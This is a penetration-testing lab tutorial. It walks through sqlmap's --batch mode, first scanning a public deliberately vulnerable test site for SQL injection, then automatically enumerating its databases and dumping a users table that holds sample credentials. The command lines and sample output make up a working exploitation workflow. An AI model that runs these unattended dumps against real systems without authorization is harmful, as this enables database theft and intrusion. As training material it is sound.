Introduction
In this lab, you will explore the powerful --batch mode feature in sqlmap, a popular open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws. While sqlmap is highly interactive by default, often prompting the user for decisions during a scan, the --batch mode allows you to run scans in an unattended fashion by automatically choosing the default answer to all prompts. This is particularly useful for automating scans in scripts or for large-scale assessments where manual intervention is impractical. You will learn the difference between interactive and non-interactive scanning, perform a manual scan, and then leverage --batch mode to automate the process, including a full data dump.
Understand Interactive vs. Non-interactive Scanning
In this step, you will understand the fundamental difference between interactive and non-interactive scanning with sqlmap. By default, sqlmap is designed to be interactive, meaning it will frequently pause during a scan to ask the user for input regarding various decisions, such as whether to continue with a specific test, use a certain payload, or exploit a vulnerability. This interactivity provides fine-grained control but can be cumbersome for automated tasks. Non-interactive scanning, on the other hand, allows sqlmap to make default decisions without user intervention, making it suitable for scripting and large-scale automation.
Let's start by checking the sqlmap version to ensure it's installed correctly.
sqlmap --version
You should see output similar to this, indicating sqlmap is ready:
sqlmap version: 1.x.x.x (rXXXX)
Now, let's briefly look at the help menu to see the --batch flag.
sqlmap --help | grep batch
You will see output similar to:
--batch Never ask for user input, use the default behavior.
This confirms the existence and purpose of the --batch flag.
Run a Scan and Answer Prompts Manually
In this step, you will perform a basic sqlmap scan against a known vulnerable URL without using the --batch flag. This will demonstrate the interactive nature of sqlmap and the various prompts it presents during a scan. You will need to manually answer these prompts to proceed with the scan.
We will use a publicly available vulnerable URL for this demonstration. Please note that in a real-world scenario, you should only perform scans on systems you have explicit permission to test.
Execute the following sqlmap command. Pay close attention to the questions sqlmap asks and how you need to respond.
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1"
As the scan progresses, sqlmap will likely ask you several questions. For example:
do you want to keep testing the others (if any)? [y/N]- You can pressN(No) and thenEnter.sqlmap detected that the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSs? [Y/n]- You can pressY(Yes) and thenEnter.for the remaining tests, do you want to include all tests for 'MySQL', extend provided level and risk values? [Y/n]- You can pressY(Yes) and thenEnter.
The exact prompts may vary based on the sqlmap version and the target's response. The key is to observe that sqlmap requires your input to continue.
After the scan completes, sqlmap will report any detected vulnerabilities.
---
[XX:XX:XX] [INFO] testing connection to the target URL
[XX:XX:XX] [INFO] checking if the target is protected by some kind of WAF/IPS
[XX:XX:XX] [INFO] the target URL is stable
[XX:XX:XX] [INFO] testing if 'cat' parameter is dynamic
[XX:XX:XX] [INFO] confirming that 'cat' parameter is dynamic
[XX:XX:XX] [INFO] testing for SQL injection on parameter 'cat'
...
[XX:XX:XX] [INFO] parameter 'cat' is vulnerable.
...
---
This manual interaction highlights why automation is crucial for efficiency.
Use the --batch Flag for Automatic Default Answers
In this step, you will re-run the sqlmap scan, but this time you will include the --batch flag. This flag tells sqlmap to automatically use the default answer for any prompt it encounters, effectively making the scan non-interactive. This is incredibly useful for scripting and automating vulnerability assessments.
Execute the following command, adding the --batch flag:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --batch
Observe the output. You will notice that sqlmap proceeds with the scan without pausing for any user input. All the questions that appeared in the previous step are now automatically answered with their default values (usually 'yes' or 'no' depending on the context).
The output will flow continuously, similar to this:
---
[XX:XX:XX] [INFO] testing connection to the target URL
[XX:XX:XX] [INFO] checking if the target is protected by some kind of WAF/IPS
[XX:XX:XX] [INFO] the target URL is stable
[XX:XX:XX] [INFO] testing if 'cat' parameter is dynamic
[XX:XX:XX] [INFO] confirming that 'cat' parameter is dynamic
[XX:XX:XX] [INFO] testing for SQL injection on parameter 'cat'
...
[XX:XX:XX] [INFO] parameter 'cat' is vulnerable.
...
---
This demonstrates the power of --batch mode for unattended operations.
Execute a Full Data Dump in Batch Mode
In this step, you will combine the --batch flag with other sqlmap options to perform a more advanced operation: dumping all data from the database, all in an automated fashion. This showcases how --batch mode enables complex exploitation tasks without manual intervention.
We will use the --dbs (enumerate databases), --tables (enumerate tables), --columns (enumerate columns), and --dump (dump entries) options to extract information. Since we are using --batch, sqlmap will automatically confirm any prompts related to these operations.
First, let's try to enumerate databases in batch mode:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs --batch
You should see sqlmap automatically identify the databases without asking for confirmation. The output will list the databases found, for example:
---
[XX:XX:XX] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema
---
Now, let's try to dump all data from the acuart database. This will involve enumerating tables and then columns, and finally dumping the data.
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --dump --batch
This command will instruct sqlmap to:
- Target the
acuartdatabase (-D acuart). - Dump all data (
--dump). - Do so in batch mode (
--batch), meaning it will automatically answer "yes" to prompts like "do you want to dump all tables?" or "do you want to store hashes to a file?".
The output will show sqlmap enumerating tables, then columns, and finally dumping the data, all without any prompts. This process might take some time depending on the amount of data.
---
[XX:XX:XX] [INFO] fetching tables for database 'acuart'
[XX:XX:XX] [INFO] fetching columns for table 'users' in database 'acuart'
[XX:XX:XX] [INFO] dumping table 'users' of database 'acuart'
...
+----+----------+----------+----------+
| id | email | password | uname |
+----+----------+----------+----------+
| 1 | test@test.com | test | test |
| 2 | admin@admin.com | admin | admin |
...
+----+----------+----------+----------+
---
This demonstrates the full automation capability of sqlmap with --batch mode for data extraction.
Review the Results of the Unattended Scan
In this final step, you will review the results of the unattended scans performed using --batch mode. sqlmap stores its findings, including dumped data, in a designated output directory. Understanding where these results are stored is crucial for post-exploitation analysis and reporting.
By default, sqlmap creates an output directory in ~/.sqlmap/output/ (or /root/.sqlmap/output/ if run as root, but in this lab, it's ~/.sqlmap/output/). Inside this directory, there will be subdirectories named after the target host.
First, navigate to the sqlmap output directory:
cd ~/.sqlmap/output/
Now, list the contents of this directory to find the target host's folder:
ls -F
You should see a directory named testphp.vulnweb.com/ or similar.
testphp.vulnweb.com/
Navigate into the target's directory:
cd testphp.vulnweb.com/
List the contents again. You will find various files and directories containing the scan results, including log files, dumped data, and potentially other findings.
ls -F
You might see files like log, session.sqlite, and directories like dump/.
dump/ log session.sqlite target.txt
Now, let's look into the dump directory to see the extracted data:
ls -F dump/
You should see a directory for the acuart database, and inside it, files corresponding to the dumped tables (e.g., users.csv).
dump/acuart/
Finally, you can view the content of a dumped file, for example, the users.csv file:
cat dump/acuart/users.csv
This will display the data that sqlmap extracted from the users table, confirming the success of your automated data dump.
id,email,password,uname
1,test@test.com,test,test
2,admin@admin.com,admin,admin
...
This concludes the lab on automating sqlmap scans with batch mode. You have successfully performed interactive and non-interactive scans and extracted data in an automated fashion.
Summary
In this lab, you gained practical experience with sqlmap's --batch mode, a crucial feature for automating SQL injection vulnerability assessments. You started by understanding the difference between interactive and non-interactive scanning, observing how sqlmap typically prompts for user input. You then successfully executed scans using the --batch flag, demonstrating how it streamlines the process by automatically providing default answers to all prompts. Finally, you performed an automated data dump and learned how to locate and review the results stored by sqlmap in its output directory. This knowledge is fundamental for integrating sqlmap into automated security testing pipelines and for efficient large-scale vulnerability analysis.
